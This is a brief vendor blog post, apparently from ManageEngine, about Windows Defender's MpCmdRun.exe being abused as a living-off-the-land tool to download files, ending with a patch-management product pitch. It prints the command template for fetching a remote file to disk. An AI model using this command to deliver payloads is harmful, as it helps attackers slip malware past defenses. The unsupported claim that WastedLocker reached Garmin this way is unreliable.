Microsoft recently released a update for Windows Defender, which comes with a major vulnerability that allows applications to download malware in the host machine. Abusing legitimate system files to download malware is called a living-off-the-land libraries (LOLBIN) attack.

The issue exists in the command line MpCmdRun.exe, allowing malicious actors to download a malicious program to the host device from a remote location.

Security researcher Mohammad Askar has identified this issue and posted it on Twitter. This threat allows a user to download any file from a remote location using the below command line:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Check Mohammad's Tweet about Windows Defender's antimalware command line vulnerability in version 4.18.2009.9.

Ransomware called WastedLocker hit Garmin enterprises through the command line argument mentioned above. Windows Defender will be able to detect the presence of this malicious file while scanning the host device for harmful programs, but it's unclear at the moment if other anti-virus programs will be able to detect this file.

System administrators need to be aware of this unique threat vector residing in Windows Defender—a solution that is supposed to improve the security of the devices. At the time of publishing this blog, Microsoft has yet to fix this vulnerability, and sysadmins are being advised to wait to update to the latest version once a patch is available. If you've already updated, roll back to the previous version until a fix is issued.

If you're using a patch management solution, you can easily roll back the patches on your managed devices. Not using an endpoint management solution, yet? Try ManageEngine Patch Manager Plus.